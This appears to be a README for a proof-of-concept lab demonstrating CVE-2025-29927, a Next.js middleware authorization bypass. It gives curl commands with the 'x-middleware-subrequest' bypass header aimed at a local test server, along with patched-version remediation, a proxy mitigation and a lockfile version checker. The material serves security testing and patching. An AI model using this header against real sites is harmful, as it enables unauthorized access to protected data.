# Next.js Middleware Vulnerability Tester (CVE-2025-29927)
This application demonstrates the Next.js middleware authorization bypass vulnerability (CVE-2025-29927).
## About The Vulnerability
CVE-2025-29927 is an authorization bypass vulnerability in Next.js middleware. By sending a specially crafted HTTP header (`x-middleware-subrequest`), an attacker can bypass authorization checks implemented in the middleware, potentially gaining access to protected resources.
## Setup Instructions
1. Install dependencies:
```
cd /var/www/react-nextjs/test-middleware-skip
npm install
```
2. Run the development server:
```
npm run dev
```
3. The server will start on http://localhost:3000
## Testing the Vulnerability
### Normal Access (Should be Blocked)
Try accessing the protected route normally:
```
npm run test-normal
```
or
```
curl -v http://localhost:3000/protected-data
```
You should receive a 401 Unauthorized response, as the middleware blocks access.
### Exploiting the Vulnerability
Try accessing the protected route with the exploit header:
```
npm run test-exploit
```
or
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data
```
If the application is vulnerable, you'll receive a 200 OK response with the protected data.
### Testing the API Route
Normal access (should be blocked):
```
curl -v http://localhost:3000/api/protected
```
With exploit:
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Remediation
To fix this vulnerability, you should:
1. Update Next.js to a patched version:
   - Next.js 15.x: Update to 15.2.3 or later
   - Next.js 14.x: Update to 14.2.25 or later
   - Next.js 13.x: Update to 13.5.9 or later
   - Next.js 12.x: Update to 12.3.5 or later
2. If you cannot update, put a reverse proxy (like Nginx or Cloudflare) in front of the application and have it strip the `x-middleware-subrequest` header from incoming requests.
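To check which side of those version thresholds a project is on, the following added example (not part of the original repository) classifies the resolved `next` version from a parsed `package-lock.json`. The function names and sample lockfiles are constructed for illustration; major lines not listed above and prerelease builds are reported as `unknown` rather than guessed.

```javascript
// Minimum fixed release per major line, copied from the list above.
const PATCHED = { 15: [15, 2, 3], 14: [14, 2, 25], 13: [13, 5, 9], 12: [12, 3, 5] };

// Accepts an exact resolved version such as "14.2.25" or "15.3.0-canary.1".
// Ranges ("^14.2.0") are rejected: they say what may be installed, not what is.
function parseVersion(raw) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?$/.exec(String(raw).trim());
  if (!m) return null;
  return { parts: [Number(m[1]), Number(m[2]), Number(m[3])], prerelease: Boolean(m[4]) };
}

function classifyNextVersion(raw) {
  const v = parseVersion(raw);
  if (!v) return "unparseable";
  const min = PATCHED[v.parts[0]];
  // Major lines the list does not cover, and prereleases, are not decided here.
  if (!min || v.prerelease) return "unknown";
  for (let i = 0; i < 3; i++) {
    if (v.parts[i] > min[i]) return "patched";
    if (v.parts[i] < min[i]) return "vulnerable";
  }
  return "patched"; // exactly the minimum fixed release
}

// npm lockfile v2/v3 keeps the entry under packages["node_modules/next"];
// lockfile v1 keeps it under dependencies.next.
function nextVersionFromLock(lock) {
  const entry = (lock.packages && lock.packages["node_modules/next"]) ||
    (lock.dependencies && lock.dependencies.next);
  return entry && entry.version ? entry.version : null;
}

function auditLock(lock) {
  const version = nextVersionFromLock(lock);
  if (version === null) return { version: null, status: "next-not-found" };
  return { version, status: classifyNextVersion(version) };
}

// Constructed sample lockfiles (not taken from the project's package-lock.json).
const samples = [
  { lockfileVersion: 3, packages: { "node_modules/next": { version: "15.2.2" } } },
  { lockfileVersion: 3, packages: { "node_modules/next": { version: "14.2.25" } } },
  { lockfileVersion: 1, dependencies: { next: { version: "13.5.6" } } },
  { lockfileVersion: 3, packages: { "node_modules/next": { version: "15.3.0-canary.1" } } },
];
for (const lock of samples) console.log(auditLock(lock));
```

In a real project, pass the result of `JSON.parse` on the contents of `package-lock.json` to `auditLock`.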
## Additional Test Commands
Test if the API route is vulnerable:
```
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected
# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Disclaimer
This tool is provided for educational and security testing purposes only. Use it to verify if your own Next.js applications are vulnerable and need patching.
File snapshot
```
[4.0K] /data/pocs/c300792b8773289aac5ccc2f662e85f67b9edf1a
├── [4.0K] app
│   ├── [4.0K] api
│   │   └── [4.0K] protected
│   │       └── [ 837] route.ts
│   ├── [ 626] globals.css
│   ├── [ 502] layout.tsx
│   ├── [1.3K] page.tsx
│   ├── [4.0K] protected-data
│   │   └── [1.0K] page.tsx
│   └── [4.0K] public-data
│       └── [ 667] page.tsx
├── [1.6K] header-variations.sh
├── [1.3K] middleware.ts
├── [ 205] next.config.js
├── [ 603] package.json
├── [ 16K] package-lock.json
├── [3.6K] PROJECT_OVERVIEW.md
├── [4.0K] public
│   ├── [1.3K] next.svg
│   └── [ 629] vercel.svg
├── [2.3K] README.md
├── [1.2K] RUN_TESTS.md
├── [4.0K] src
│   ├── [4.0K] app
│   │   ├── [ 25K] favicon.ico
│   │   ├── [2.2K] globals.css
│   │   ├── [ 456] layout.tsx
│   │   ├── [3.8K] page.module.css
│   │   ├── [2.7K] page.tsx
│   │   └── [4.0K] protected
│   │       └── [ 697] page.tsx
│   └── [1.2K] middleware.ts
├── [4.5K] TESTING_INSTRUCTIONS.md
├── [3.4K] test-vulnerability.sh
├── [ 574] tsconfig.json
├── [1.4K] upgrade-and-test.sh
└── [7.3K] vuln-test-all.sh

9 directories, 28 files
```